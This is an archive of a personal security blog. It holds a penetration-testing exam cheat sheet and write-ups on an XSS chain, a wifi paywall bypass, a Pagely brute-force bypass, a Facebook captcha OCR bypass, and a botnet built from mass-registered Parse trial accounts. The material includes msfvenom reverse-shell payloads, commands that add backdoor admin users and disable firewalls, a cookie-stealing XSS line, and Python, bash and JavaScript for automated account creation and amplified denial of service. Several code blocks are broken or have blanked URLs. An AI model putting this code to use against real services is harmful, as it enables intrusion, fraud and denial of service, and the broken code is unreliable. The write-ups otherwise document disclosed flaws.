Wednesday 31 December 2014

CREST CRT Exam Preparation

I'm going to be taking the CREST CRT exam in January and wanted to share my preparation notes with the world to save everyone else the time and effort of digging up this information to pass the exam.

Note: I have not taken the exam yet, I do not know the answers and am in no way affiliated with CREST.
Note Note: I passed the exam. Due to confidentiality reasons I can't provide any hints. I will however leave this post up to assist future participants :)

What have we gotta do?

First things first, the official CREST site and CRT page is here:

To quote the official documentation - "The Certification Examination has two components: a multiple choice written question section and a practical assessment which is also examined using multiple choice answers. The practical assessment tests candidates’ hands-on penetration testing methodology and skills against reference networks, hosts and applications."

For the "written question" section I'd recommend Wikipedia or some SANS/CEH material. For the practical side of things see below.

Getting hands-on!

My goal during the practical exam is to be as quick and efficient as possible. I want to minimize time spent analyzing results, configuring tools or writing custom stuff and maximize time spent answering questions! I plan to use a Windows box with a Kali Linux VM. Below is my full list of tools and one-liners:


nmap -T4 -A -Pn -oA scan -v <target>
Full scan (-A) with output saved in all formats under "scan"
for i in 21 22 23 80 443 445;do cat scan.gnmap|grep " $i/open"|cut -d " " -f2 > $i.txt;done
Parse results into txt files per port
nmap -T4 -v -oA myshares --script smb-enum-shares --script-args smbuser=pwndizzle,smbpass=mypassword -p445 <target>
Scan for open shares
dig axfr <domain> @ns1.example.com
DNS zone transfer (Linux)
tcp.port, tcp.srcport, ip.src, ip.dst, or, and
Wireshark filter syntax
tcpdump tcp port 80 -w output.pcap -i eth0
Tcpdump syntax
mount <target>:/<share> /mnt/nfs
Mount an NFS share
mount -o nolock -t nfs -o proto=tcp,port=2049 <target>:/<share> /mnt
Mount an NFS share
mount -t cifs -o username=<user>,password=<password> //WIN_PC_IP/<share name> /mnt/windows
Mount a Windows share
net use x: \\filesvr001\folder1 <password> /user:domain01\jsmith /savecred /p:no
Mount a Windows share
net use \\<target>\IPC$ "" /u:""
Null session
rpcclient -U "" <target>
Null session domain info
onesixtyone -c names -i snmphosts
SNMP enum
snmpcheck -t <target> -c public
SNMP enum
nslookup -> set type=any -> ls -d <domain>
DNS zone transfer (Windows)
nmap --script=smb-check-vulns --script-args=unsafe=1 -p445 <host>
SMB vuln scan
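If you prefer Python over the shell one-liner, the gnmap parsing above can be sketched like this. This is just a convenience sketch, not part of the original toolkit; the sample line follows standard gnmap output.

```python
import re
from collections import defaultdict

def hosts_by_port(gnmap_lines, ports=(21, 22, 23, 80, 443, 445)):
    """Return {port: [ips]} for every host with that port open."""
    result = defaultdict(list)
    for line in gnmap_lines:
        m = re.match(r"Host: (\S+)", line)
        if not m or "Ports:" not in line:
            continue
        for port in ports:
            # gnmap marks open ports as "<port>/open"
            if re.search(r"\b%d/open\b" % port, line):
                result[port].append(m.group(1))
    return dict(result)

sample = ["Host: 10.0.0.1 ()\tPorts: 21/open/tcp//ftp///, 445/open/tcp//microsoft-ds///"]
print(hosts_by_port(sample))
```

Same idea as the for loop, but you get a dictionary you can feed straight into other scripts instead of one file per port.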


use auxiliary/scanner/http/dir_scanner
Scan for directories
use auxiliary/scanner/http/jboss_vulnscan
JBoss scan
use exploit/multi/http/jboss_maindeployer
JBoss deploy
use auxiliary/scanner/mssql/mssql_login
MSSQL cred scan
use exploit/windows/mssql/mssql_payload
MSSQL payload
use auxiliary/scanner/mysql/mysql_version
MySQL version scan
use auxiliary/scanner/mysql/mysql_login
MySQL login
use auxiliary/scanner/oracle/oracle_login
Oracle login
use exploit/windows/dcerpc/ms03_026_dcom
Eazymode
use exploit/windows/smb/ms06_040_netapi
Eazymode
use exploit/windows/smb/ms08_067_netapi
Eazymode
use exploit/windows/smb/ms09_050_smb2_negotiate_func_index
Eazymode
run post/windows/gather/win_privs
Show privs of current user
use exploit/windows/local/bypassuac (check if x86/64 and set target)
Bypass UAC on Win7+
load mimikatz -> wdigest
Dump creds
load incognito -> list_tokens -> impersonate_token
Use tokens
use post/windows/gather/credentials/gpp
GPP
run post/windows/gather/local_admin_search_enum
Test other machines
msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=4445 R | msfencode -t exe -e x86/shikata_ga_nai -c 5 > custom.exe
Standalone meterpreter
use exploit/multi/script/web_delivery
Powershell payload delivery
post/windows/manage/powershell/exec_powershell
Upload and run a PS script through a session
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 -a x86 -f exe -e x86/shikata_ga_nai -b '\x00' -i 3 > meter.exe
Generate standalone payload


ipconfig /all
Displays full information about your NICs.
ipconfig /displaydns
Displays your local DNS cache.
netstat -nabo
Lists ports / connections with corresponding process (-b), no name resolution (-n), all connections (-a) and owning process ID (-o)
netstat -r
Displays the routing table

netstat -anob | findstr “services, process or port”
The “b” flag makes the command take longer but will output the process name using each of the connections.
netsh diag show all
{XP only} Shows information on network services and adapters
net view
Queries NBNS/SMB (SAMBA) and tries to find all hosts in your current workgroup or domain.
net view /domain
List all domains available to the host
net view /domain:otherdomain
Queries NBNS/SMB (SAMBA) and tries to find all hosts in the ‘otherdomain’
net user %USERNAME% /domain
Pulls information on the current user, if they are a domain user. If you are a local user then you just drop the /domain. Important things to note are login times, last time changed password, logon scripts, and group membership
net user /domain
Lists all of the domain users
net accounts
Prints the password policy for the local system. This can be different and superseded by the domain policy.
net accounts /domain
Prints the password policy for the domain
net localgroup administrators
Prints the members of the Administrators local group
net localgroup administrators /domain
Although this mixes localgroup with /domain, it queries the Administrators group on the domain controller, which is effectively another way of listing the *current* domain's admins
net group “Domain Admins” /domain
Prints the members of the Domain Admins group
net group “Enterprise Admins” /domain
Prints the members of the Enterprise Admins group
net group “Domain Controllers” /domain
Prints the list of Domain Controllers for the current domain
net share
Displays your currently shared SMB entries, and what path(s) they point to
net session | find "\\"
Lists open sessions to the host

arp -a
Lists all the systems currently in the machine’s ARP table.
route print
Prints the machine’s routing table. This can be good for finding other networks and static routes that have been put in place
whoami
View the current user
tasklist /v
List processes
taskkill /F /IM "cmd.exe"
Kill a process by its name
net user hacker hacker /add
Creates a new local (to the victim) user called ‘hacker’ with the password of ‘hacker’
net localgroup administrators hacker /add
Adds the new user ‘hacker’ to the local administrators group
net share nothing$=C:\ /grant:hacker,FULL /unlimited
Shares the C drive (you can specify any drive) out as a Windows share and grants the user ‘hacker’ full rights to access, or modify anything on that drive.

One thing to note is that in newer Windows versions (I believe since XP SP2), share permissions and file permissions are separate. Since we added ourselves as a local admin this isn't a problem, but it is something to keep in mind
net user username /active:yes /domain
Changes an inactive / disabled account to active. This can be useful for re-enabling old domain admin accounts, but it still puts up a red flag if those accounts are being watched.
netsh firewall set opmode disable
Disables the local windows firewall

wmic useraccount get name,sid
Retrieve name and SID from the command line.


apt-get install finger rsh-client jxplorer sipcalc
Finger not installed in Kali by default
apt-get install rsh-client
R-tools not installed in Kali by default
uname -a
Kernel version
cat /etc/<distro>-release
Release version
showrev -p
Revision (Solaris)
rlogin -l <user> <target>
rlogin
rsh <target> <command>
rsh
find / -perm +6000 -type f -exec ls -ld {} \; > setuid.txt &
Find setuid binaries
finger <username>@<ip>
Retrieve user info
mysql -h <ip> -u <user> -p<password>
Connect to mysql (no space after -p, or the next argument is treated as a database name)
oscanner -s <ip> -r <repfile>
Oracle scanner


hydra -L users -P passwords -M 21.txt ftp
Brute ftp
hydra -L users -P passwords -M 22.txt ssh
Brute ssh
hydra -L users -P passwords -M 445.txt smb
Brute smb

User List


john --wordlist=/usr/share/wordlists/rockyou.txt hashes
JTR default


document.write('<img src="' + document.cookie + '" />');
XSS steal cookie
sqlmap -u <target> -p PARAM --data=POSTDATA --cookie=COOKIE --level=3 --current-user --current-db --passwords --file-read="/var/www/test.php"
Targeted scan
sqlmap -u <target> --forms --batch --crawl=10 --cookie=jsessionid=12345 --level=5 --risk=3
Automated scan

Wednesday 26 November 2014

Traversal to Redirect to Remote JS XSS

I recently came across an interesting snippet of Javascript that looked exploitable but the path to exploitation wasn't that obvious. This post will be about how I achieved a working XSS.

The Code

The vulnerable page was loaded with a URL something like this:
And contained Javascript looking something like this:
var country = getUrlParam('c'); // value taken from the URL parameter "c" (retrieval helper is hypothetical)
var s = document.createElement('script');
var src = '/js/timezone-js/timezone-data[' + country + '].min.js';
s.src = src;
document.head.appendChild(s);

Can you spot how to exploit it? :)


In a nutshell the JS appends a new <script> element to the <head> element. The user is able to modify the country part of the script element as this is retrieved from the URL parameter "c".

Once the above script runs you end up with something like:
<script src="/js/timezone-js/timezone-data[test].min.js"></script>
So how can we exploit this?

From Text to Traversal

In terms of regular inline XSS there are two potential injection points, either directly in the JS or within the HTML output. In this instance neither works because of the way the input is handled and encoded.

We can however use path traversal to load any JS file on the server. For example, to load a legitimate file with traversal we could do this:[UK.min.js]?
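To see why the traversal works, here's a quick Python illustration: `posixpath.normpath` collapses the `../` segments the same way the browser's URL resolution does when fetching the script (posixpath is only a stand-in here, the browser does the real work):

```python
import posixpath

# The src string built by the vulnerable JS:
base = "/js/timezone-js/timezone-data[{}].min.js"

# A legitimate country value stays inside the js directory:
print(posixpath.normpath(base.format("UK")))
# -> /js/timezone-js/timezone-data[UK].min.js

# A traversal payload in the "c" parameter climbs out of /js/timezone-js/:
payload = "/../../../../accounts/logout/?next="
print(posixpath.normpath(base.format(payload)))
# -> /accounts/logout/?next=].min.js
```

Note how the trailing "].min.js" ends up inside the query string, so it no longer constrains which resource gets loaded.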

But we still have no way to load our own JS...or do we?

From Traversal to Dead End?

The easiest way to get JS execution from the traversal would have been to locate an upload feature or error message on the same domain that allowed the user to control the first few bytes of the response. This would have allowed the inclusion of a JS payload that could have been accessed through the traversal.

For example:
Unfortunately I couldn't find such a place....but I did have an open redirection I could play with.

From Redirection to JS

The open redirection was pretty standard, something like:
Open redirection is often classed as medium/low risk but in this instance it was the final piece of the XSS puzzle as it would allow us to redirect a browser offsite to grab remote JS.

Combining the traversal and redirection the complete attack URL was:

Which would cause the in-page JS to create a script tag that would load our malicious remote JS:
<script src="/../../../../accounts/logout/?next=].min.js"></script>

Congratulations you've achieved XSS by loading remote JS from traversal and redirection!

The Fix

I definitely think this functionality could have been handled in a cleaner way using server-side code. A quick fix though would have been to whitelist the country parameter to prevent path traversal.
country = country.replace(/[^\w\-]/g, '');

Final Thoughts

I really enjoyed exploiting this issue as it involved stringing multiple flaws together to achieve a working XSS which at first glance didn't seem possible. I guess the moral of the story is always think outside the box and don't write sloppy Javascript :)

If you have any questions or feedback just drop me a comment below. Pwndizzle out.

Wednesday 22 October 2014

Boingo Hotspot Bypass Analysis

In this post I'll take a look at what seems to be a bypass vulnerability in the current version of Boingo hotspot that allows anyone to access free wifi.


While waiting for my plane at JFK airport I thought I'd check for free wifi, scanning the local area I saw an AP called "Boingo hotspot" and decided to give it a go.

However after connecting to the access point I found out Boingo was a pay only wifi service and all my requests were being redirected to the Boingo site.

Looking over the site I came across the "Good Stuff" feature which appeared to allow access to a small number of whitelisted sites for free. However after visiting one of the Good Stuff links I somehow gained full unrestricted internet access...

Googling this feature, it turns out the flaw had already been discovered and publicly disclosed. Nowhere, however, explained how the flaw actually worked. Let's take a look.

Secret to the Good Stuff

The Good Stuff feature, in theory, provides access to a small selection of whitelisted sites. For example:

Behind each of those buttons is an interesting looking link, something like this:

It turns out the promoId/promocode function as a kind of username/password and once the link is clicked an authentication process is kicked off. Roughly something like this:

1. After clicking the link the server will return a sessionID ("s"), which is then sent with the promoid/promocode to retrieve temporary credentials.

2. The temporary username and password received are then submitted to login.aspx in a POST request. Notice that the temporary username includes my MAC address, promocode, airport, terminal and a suspicious password-like string "bwpromo!1".


3. Once the login request completes, your IP should have been added to the allowed list and you can now browse the full internet! For reference, the temporary username submitted looked like:

|C01885DBFED1|0|0|0|Promo|0|BIP000000000108|jfk|term7|0|1412015104
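The temporary username is just pipe-delimited metadata, so it can be pulled apart trivially. A sketch using the example value above; the field meanings are my guesses from context, not anything documented by Boingo:

```python
# Example temporary username observed during the Boingo login flow:
temp_user = "|C01885DBFED1|0|0|0|Promo|0|BIP000000000108|jfk|term7|0|1412015104"

parts = temp_user.split("|")
mac      = parts[1]   # client MAC address
promo    = parts[7]   # promo/account identifier (guess)
airport  = parts[8]
terminal = parts[9]
ts       = parts[11]  # looks like a unix timestamp (guess)

print(mac, promo, airport, terminal)
# C01885DBFED1 BIP000000000108 jfk term7
```

Everything the "authentication" relies on is client-observable, which fits with the whitelist never actually being enforced server-side.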

What the heck is going on?

The main issue is that whitelist restrictions for "Good Stuff" users are simply not enforced. There should be some server-side mechanism that is monitoring and filtering http requests to only allow content from whitelisted sites, this seems to be missing or at least was not enabled.

Also I'm not too sure why they included an authentication process for the free content. For paying customers authentication makes sense but for free content it shouldn't be needed. Tracking users is one possibility but this could have been done with cookies, headers or POST requests.

Final thoughts

With only an hour to spare before my flight it was a shame I didn't have longer to play with the Boingo hotspot. When you come across issues as bizarre as this you just know there are more security holes just lurking below the surface :)

Thanks for reading, feedback and questions are welcome, just drop me a comment below.

Wednesday 10 September 2014

Building a Cloud Botnet on Parse

Today I'm going to talk about Parse and a trial account feature that allowed me to build a cloud botnet.

Parse is a cloud based app service that lets you deploy and run your app code in the cloud making building and maintaining apps easier. Facebook bought the company in 2013 and with it being eligible for the bounty program I thought I'd take a look for security issues.

Want a free account?

Parse offer free trial accounts with 20GB storage, 2TB traffic per month, a maximum of 30 requests/sec and the ability to run one process at a time for a maximum of 15 seconds before it's killed.

The stats above are for one account, but how about if we sign up for two accounts? Well that would effectively double all my quotas. How about a hundred, thousand or a million accounts? I could massively increase my limits and cause all kinds of mischief.

Taking a look at the registration page (in 2013) there was no hardening at all. Account registration was as simple as sending this POST request:

In 2013 no email verification was required, no CSRF token, no captcha, no throttling. The security team had basically missed the registration page. One year later, email verification is still not required. A CSRF header is now required and so is a session cookie. But there still isn't any anti-automation so anyone could register a million trial accounts.

Building my army

In 2013 it was easy to register accounts by just using Burp Intruder to send multiple registration POST requests. Because of the new session/CSRF requirements in 2014 I created a python script to perform registration.

The script will connect to Parse, grab session info and CSRF header, register an account, register an app for that account then grab the API keys which we'll need to communicate with our bots.

My account creation script:
import requests
import re
from random import randint

for i in xrange(0,100,1):
    user = "blahblah" + str(randint(100,999))
    print user

    print "[+] Getting Parse main page"    
    s = requests.Session()
    r = s.get('')
    global csrf;
    csrf = re.findall('[a-zA-Z0-9+/]{43}=', r.text);
    print "-----CSRF Token: " + csrf[0]
    s.headers.update({'X-CSRF-Token': csrf[0]})

    print("[+] Posting registration request");
    payload = {'user[name]':user, 'user[email]':user+'', 'user[password]':'password1'};
    r = s.post('', params=payload)
    print r.status_code

    print("[+] PUTing new app name");
    s.headers.update({'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8'})
    payload = {'user[company_type]':'individual','parse_app[name]':'blahblahblah'+str(randint(100,999))};
    r = s.put('', params=payload);
    print r.status_code

    print("[+] Grabbing keys");
    r = s.get('');
    print r.status_code
    # Parse the key fields out of the returned HTML (regex is a best guess
    # at the page layout, the original line was lost):
    keys = re.findall('<input type="text" value="[a-zA-Z0-9]+', r.text)
    print user +':'+ str(keys[0]).replace('<input type="text" value="','') + ':' + str(keys[5]).replace('<input type="text" value="','')

Using the Parse tools to deploy code

There are two ways to deploy code: either using the Parse tool (a packaged python script) or directly through the API. Directly connecting to the API is the cleaner option but it would have taken me a while to reverse the Parse tool and extract the integrity check code. To save time I just used the Parse tool as is. To use the tool though you need to create a project locally and add your apps before you can deploy code.

Create a new project:
parse new parsebotnet

Add every app locally:
#!/usr/bin/expect -f
for {set i 1} {$i < 101} {incr i 1} {
set timeout -1
spawn parse add
expect "Email:*"
send -- "test$\r"
expect "Password:*"
send -- "test$i\r"
expect "Select an App:"
send -- "1\r"
send -- "\r"
}

You can then grep the appids and keys from the global.json settings file:
cat global.json|grep applicationId|cut -d "\"" -f4 > appid
cat global.json|grep masterKey|cut -d "\"" -f4 > keys
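Since global.json is just JSON, a small Python sketch can pull the same fields more robustly than grep/cut. The "applications" layout here is an assumption about the Parse tool's settings file:

```python
import json

def extract_keys(path="global.json"):
    """Return (app name, applicationId, masterKey) tuples from global.json."""
    with open(path) as f:
        cfg = json.load(f)
    # Assumed layout: {"applications": {"<name>": {"applicationId": ..., "masterKey": ...}}}
    return [(name, app.get("applicationId"), app.get("masterKey"))
            for name, app in cfg.get("applications", {}).items()]
```

This avoids grep picking up stray matches and keeps app names paired with their keys.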

To send code to Parse you just put code in the cloud folder on your local machine and run the deploy command. I started off by putting the helloworld program in main.js:
Parse.Cloud.define("hello", function(request, response) {
  response.success("Hello world!");
});

And uploaded it to every bot using a bash for loop:
for i in {1..100};do echo "Job#$i";parse deploy testapp1$i & done;

Not the cleanest approach but the Parse tool does all of the leg work.

Running Code

With the bot accounts created and code uploaded I could call the API and have the bots actually run my code. The simple approach was just using Curl:

exec 5<appid
exec 6<key
# Read an appid/key pair per line and call the cloud function endpoint.
# $FUNCTION_URL is a placeholder for the app's /functions/<name> URL.
while read l1<&5 && read l2<&6; do
  curl -X POST -H "X-Parse-Application-Id: $l1" -H "X-Parse-Master-Key: $l2" -H "Content-Type: application/json" -d '{}' "$FUNCTION_URL"
  printf "\n"
done

I also put together a more snazzy python script with threading code from stackoverflow:
import requests
import re
from random import randint
import threading
import time
import Queue
import json

with open("appid") as f:
    appid = f.readlines()

with open("keys") as f:
    key = f.readlines()

s = requests.Session()

def callapi(x):
    s.headers.update({'X-Parse-Application-Id': appid[x].rstrip()})
    s.headers.update({'X-Parse-Master-Key': key[x].rstrip()})
    payload = {'' : ''}
    r = s.post('', data=json.dumps(payload))
    print "No: " + str(x) + "  Code:" + str(r.status_code) + "  Dataz:" + str(r.text)

queue = Queue.Queue()

class ThreadUrl(threading.Thread):

  def __init__(self, queue):
    threading.Thread.__init__(self)
    self.queue = queue

  def run(self):
    while True:
      #grabs a job number from the queue
      j = self.queue.get()

      #calls the api for one of the bots (index wrap is my reconstruction)
      callapi(j % len(appid))

      #signals to queue job is done
      self.queue.task_done()

start = time.time()
def main():

  #spawn a pool of threads, and pass them queue instance
  for m in range(160):
    t = ThreadUrl(queue)
    t.setDaemon(True)
    t.start()

  #populate queue with data
  for n in xrange(0,1000,1):
    queue.put(n)

  #wait on the queue until everything has been processed
  queue.join()

main()
print "Elapsed Time: %s" % (time.time() - start)

Do something cool!

At this point I'm sure a few of you are like this:

And I guess you're wondering, after all this configuration, what can you actually do?

Well Parse allows you to process data and send HTTP requests. For a bad guy this means they could do things like mine bitcoins, crack hashes, DOS attacks or proxy malicious requests. For testing purposes I decided to focus on bitcoin mining and DOS proof of concepts.

$$$ Mining some coin $$$

Knowing next to nothing about bitcoin mining I did a little Googling and came across the post here that had a great practical explanation of mining. As mining basically consists of SHA256 hashing I decided to create a hashing benchmark script for Parse. As Parse uses Javascript I took the SHA256 crypto JS here and uploaded it to Parse with a for loop and timer.

Parse.Cloud.define("sha256", function(request, response) {

<insert CryptoJS code>

  var start = new Date();
  // Iteration count varied during testing:
  for (var i = 0; i < 100000; i++) {
    CryptoJS.SHA256("Message" + i);
  }
  response.success("time: " + ((new Date())-start)/1000);
});

Testing different iteration values I found one Parse instance could handle roughly 40,000 hashes per second which is pretty slow. Using the threaded python script I included above I continually called multiple instances and could hit about 6,000,000 hashes per second. But even this is nowhere near the speeds of real mining hardware. (Also real mining uses double SHA256 so the 6Mh/s is probably nearer 3Mh/s in real terms.)
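The numbers above can be sanity-checked with some quick arithmetic:

```python
# Quick sanity check on the mining figures quoted above:
per_instance = 40_000      # hashes/sec for one Parse instance
aggregate    = 6_000_000   # hashes/sec observed with the threaded script

concurrent = aggregate / per_instance
print(concurrent)          # 150.0 -> roughly 150 instances running at once

# Real mining does double SHA256, so the effective rate is about half:
effective_mhs = aggregate / 2 / 1e6
print(effective_mhs)       # 3.0 MH/s
```

So the threaded caller was effectively keeping around 150 instances busy, still orders of magnitude below dedicated mining hardware.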

Part of the problem is the 15 second time limit on Parse processes, another issue is Parse have throttling in place so if you make too many API requests they start blocking connections. So bitcoin mining seemed possible but not practical with the current restrictions.

Denial Of Service

Using multiple trial accounts and some form of amplification I was curious how high I could get my outbound traffic volume (going from Parse to my target).

Starting with some simple httpRequest code I was able to get my instance to send thirty outbound requests for every one API request, proving amplification was possible. Two things to note though: the outbound requests go at a max rate of around 15 requests a second, and you need to remove the success/error response as that will close the process.

Example test code is below:
Parse.Cloud.define("amptest", function(request, response) {
    // Fire multiple outbound requests per API call (loop is my reconstruction,
    // the count is illustrative):
    for (var i = 0; i < 30; i++) {
        Parse.Cloud.httpRequest({
            url: 'http://myip/hello',
            method: 'POST',
            body: {},
            success: function(httpResponse) {
                //response.success(httpResponse.text);
            },
            error: function(httpResponse) {
                //response.error("Some error: "+httpResponse.status);
            }
        });
    }
});
When scaling this up though the bottleneck is the same as the bitcoin mining, 15 second processes and max API requests per second limit the throughput. But is there any way around these restrictions?

C&C in the cloud?

It dawned on me that instead of using my workstation as the command and control I could use one of my apps as the C&C. I could send one request to my C&C app and it would communicate with all the other apps. But why stop at one C&C? Having one master, multiple slave C&Cs and a pool of workers would in theory help increase throughput as I would be sending requests from multiple Parse IP addresses.
I created some recursive app code that included a list of every bot's appid and key and pushed this to every bot. The code would select bots at random and request that they run the same code. I passed a counter parameter that was incremented after each request to give the illusion of a tiered infrastructure. When the counter hit the "worker tier", instead of calling other bots, the bot would send multiple http requests to the target site.
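The tiered fan-out can be modelled in a few lines. The numbers below are illustrative only, not the ones actually used against Parse:

```python
def total_requests(fanout, tiers, requests_per_worker):
    """One API call to the master -> how many HTTP requests hit the target?"""
    workers = fanout ** tiers            # bots reached at the worker tier
    return workers * requests_per_worker

# e.g. each bot forwards to 5 others, two tiers deep, 30 requests per worker:
print(total_requests(fanout=5, tiers=2, requests_per_worker=30))
# -> 750
```

The point of the tiers is that the fan-out grows exponentially while each individual bot stays inside its own per-process limits.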

With multiple workers all simultaneously connecting to the target IP I got something like this:

The source IP is Parse, the destination is my local machine. Looking at the "Time" column you can see a throughput of roughly 600-1000 requests per second. For me this was a promising start and I'm sure with some code tweaks, more bots and more than one external IP, the requests per second could have been increased substantially.

90's worm + 2014 cloud = CLOUD WORM!?

Although I didn't have time to build a working POC I think it may be possible to build a cloud worm on Parse. In a nutshell, as Parse allow accounts to run code and send http requests, there is the possibility that a Parse app could itself create a new account, deploy and then run code. The new account would then repeat this process and so on, gradually consuming the entire cloud's resources.

Cloud worm POC is this weeks homework, class dismissed ;)

Final Thoughts

Letting people run code on your servers is a risky business. To prevent abuse you need a solid sandbox and tight resource restrictions/monitoring. In this post I've only scratched the surface of Parse looking at some super obvious issues. I wish I'd had more time to dig into the cloud worm possibilities as well as background jobs which looked interesting.

Mitigation-wise, anti-automation and email verification on the sign-up page would have helped, as would tighter inbound/outbound throttling and resource restrictions for trial accounts, and blocking app-to-app access. I believe Facebook/Parse chose not to implement these fixes and instead decided to focus on monitoring for suspicious resource usage.

Questions, comments and corrections are always appreciated! Thanks for reading.

Pwndizzle out.

Tuesday 26 August 2014

Pagely Brute Force Mitigation Bypass

A while back I was looking at one of Facebook's acquisitions, Onavo, and came across their blog which was using a Wordpress install managed by Pagely. While testing for ways to brute force the login page I discovered a brute force mitigation bypass that not only affected Onavo but also every other Pagely protected site :)

Detect Wordpress? Look for wp-login.php

Wordpress is pretty common and actually pretty secure these days. One area that still needs some work though is protection for the default login page wp-login.php. Most installations leave this page publicly exposed and a lot do not implement the recommended brute force mitigations here:

Onavo took the easy approach and used Pagely. Pagely offer managed security which in theory should mean you are more secure...

Testing for bruteforce

So let's try and brute force Onavo's wp-login page.

You can see after only a few requests we start getting redirected (302). This redirection actually takes you to a Pagely captcha page.

The magical "pagelyvalid" cookie

I was curious how they implemented the verification once past the captcha, so I took a look at the response and saw that the captcha check just set a cookie called "pagelyvalid" to true. Hmmm. Let's try our brute force attack again, this time including the magical pagelyvalid cookie.

Lots of 200's. So by simply including the pagelyvalid=true cookie we could bypass the Pagely brute force mitigation and guess passwords night and day. And like I said at the start, this didn't just affect Onavo but every site that used the Pagely service. Yikes!

Final Thoughts

A lot of sites miss brute force mitigations and rate limiting in general. Third parties can offer a quick fix but it's important to remember you are trusting your security to that third party and assuming they will do a good job (which isn't always the case!).

Both Facebook and Pagely responded reasonably quickly (the Pagely CEO even sent me a message!) and a fix has now been deployed. Hope you guys found this interesting, as usual if you have questions or suggestions just drop me a comment below.

Pwndizzle out

Thursday 10 July 2014

How to Bypass Facebook's Text Captcha

In this post I'll discuss Facebook's text captcha and how to bypass it with a little Gimp-Fu image cleaning and Tesseract OCR. The techniques below build on previous work where I demonstrated how to bypass Bugcrowd's captcha.

The Facebook Captcha(s)

I've seen Facebook use two captchas. The first is the friend photo captcha, where you are required to select your friends in pictures. This one seemed hard to bypass (except when you attack your friend's account and know all of their friends).

The second type is the text-based captcha, where you just enter the letters/numbers shown in the image. Something like this:

Let's look at some ways to bypass the text captcha :)

A couple of logic flaws...

My original aim was to focus on OCR with Tesseract but it turns out the captcha had logic flaws as well.

Issue #1 - When entering the captcha not all of the characters needed to be correct. If you got one character wrong it would still be accepted.

Issue #2 - The captcha check is case insensitive. Despite using uppercase and lowercase letters in the captcha images, the server didn't actually verify the case of user input.

Issue #3 - Captcha repetition...

Each captcha should have contained a dynamically generated string randomly chosen from a pool of 62^7 possibilities. For some reason though I encountered repetition. This is obviously very bad as with a limited set of captchas an attacker can just download every image, solve them all and achieve a 100% bypass rate in the future. I have no idea what the cause of this issue was and Facebook didn't release any details.
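For a sense of scale, the keyspace maths on those flaws works out like this:

```python
# 7 characters drawn from [a-zA-Z0-9] = 62 symbols:
pool = 62 ** 7
print(pool)               # 3521614606208, ~3.5 * 10^12 possible captchas

# Issue #2 (case-insensitive check) collapses the alphabet to 36 symbols:
case_insensitive = 36 ** 7
print(case_insensitive)   # 78364164096, roughly 45x fewer
```

And that's before issue #1 (one wrong character tolerated) and issue #3 (outright repetition), each of which shrinks the effective space further.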

The logic flaws were interesting but let's not forget OCR as well!

Back to the image...

Let's take a look at a Facebook captcha image:

When thinking about OCR analysis there's some things to note:
  • Letters/numbers themselves are clearly displayed in black - Good
  • Minimal overlaying, wiggling and distortion is used - Good
  • Black scribbles add noise to the background - Bad
  • White scribbles effectively remove pixels from the characters - Bad
I did some testing with Tesseract and found noise, image size, character size and spacing all had a big impact on the accuracy of results. For example, directly analysing the image above will return invalid characters or no response at all. To improve Tesseract results I needed some way to get rid of the noise and repair damaged characters.

Step #1 Cleaning 

I chose to use Gimp for my image cleaning as it was a program I was familiar with and it offered command line processing with Python. While the documentation (here and here) and debugging aren't too good, it gets the job done.

So first up I loaded the image and increased its size; I found processing a smaller image was less accurate and would reduce the quality of the final image.
#Load image
image = pdb.gimp_file_load(file, file)
drawable = pdb.gimp_image_get_active_layer(image)
#Double image size (scale call is my reconstruction of the missing line)
pdb.gimp_image_scale(image, image.width * 2, image.height * 2)

Next I removed the background noise. By selecting by black and then shrinking the selection, the thin black lines would be unselected, leaving just the black letters. To actually paint over the noise I just had to re-grow my selection, invert and paint white.
#Select by color black
#Shrink selection by 1 pixel
#Grow selection by 2 pixels
#Fill black
#Invert selection
#Fill white

With the outside black noise removed I inverted again to reselect the letters/numbers then translated up and down, painting after each translation. This helped fill in the white lines that in general streaked horizontally through the black characters.
#Invert selection
#Translate selection up 4 pixels and paint
#Translate selection down 10 pixels and paint

With the processing done I resized the image back to its original size and saved it.
#Resize image back to original dimensions (my reconstruction of the missing line)
pdb.gimp_image_scale(image, image.width / 2, image.height / 2)
pdb.gimp_file_save(image, drawable, file, file)

I've included the full script at the bottom of this post. I ran it with the following command:
gimp-console-2.8.exe -i -b "(python-clean RUN-NONINTERACTIVE \"test.png\")" -b "(gimp-quit 0)"

As an example, cleaning the image above I got this:

Step #2 Submitting to Tesseract

With the image now cleaned it was ready for Tesseract. To improve the accuracy of results I selected the single word mode (-psm 8) and used a custom character set (nobatch fb).
tesseract.exe test.png output -psm 8 nobatch fb

I created the fb character set in "C:\Program Files (x86)\Tesseract-OCR\tessdata\configs", it contained the following whitelist:
tessedit_char_whitelist abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
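Even with the whitelist in place, Tesseract's output can contain stray whitespace or newline characters, so it's worth normalising the guess before submitting it anywhere. A tiny post-processing helper (the function name is my own, not from any of the tools above):

```python
import string

# Characters permitted by the fb whitelist above
ALLOWED = set(string.ascii_letters + string.digits)

def normalise_guess(raw):
    # Drop anything Tesseract emitted that isn't in the whitelist
    return "".join(c for c in raw if c in ALLOWED)

print(normalise_guess("aB3 x!\n"))  # -> aB3x
```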

Step #3 Automate everything with Python

I didn't bother to build a fully working POC to automate a real attack - I'm leaving this step as homework for you guys; best script wins $1 via PayPal ;) (I am of course joking, don't actually do this!)

Theoretically though, if you did want to build a fully functioning script, you'd just need to take the Python script from my Bugcrowd post and the cleaning script from this post, combine and pwn.
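The glue between the pieces is mostly just shelling out to gimp-console and tesseract per image. A minimal sketch of that orchestration, assuming the tool names and output filename from earlier in this post (the helper names are mine):

```python
import subprocess

def build_commands(image_path):
    # Command lines as used earlier in this post; tool paths are assumptions
    gimp = ["gimp-console-2.8.exe", "-i",
            "-b", '(python-clean RUN-NONINTERACTIVE "%s")' % image_path,
            "-b", "(gimp-quit 0)"]
    tess = ["tesseract.exe", image_path, "output", "-psm", "8", "nobatch", "fb"]
    return gimp, tess

def solve_captcha(image_path):
    gimp, tess = build_commands(image_path)
    subprocess.run(gimp, check=True)   # clean the image in place with Gimp
    subprocess.run(tess, check=True)   # OCR the cleaned image -> output.txt
    # Tesseract writes its guess to output.txt
    with open("output.txt") as f:
        return
```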

Also the following can be used to download Facebook captchas after you have triggered the Facebook defenses:
from urllib.error import *
from urllib.request import *
from urllib.parse import *
import re
import subprocess

def getpage():
    try:
        print("[+] POSTing to fb")
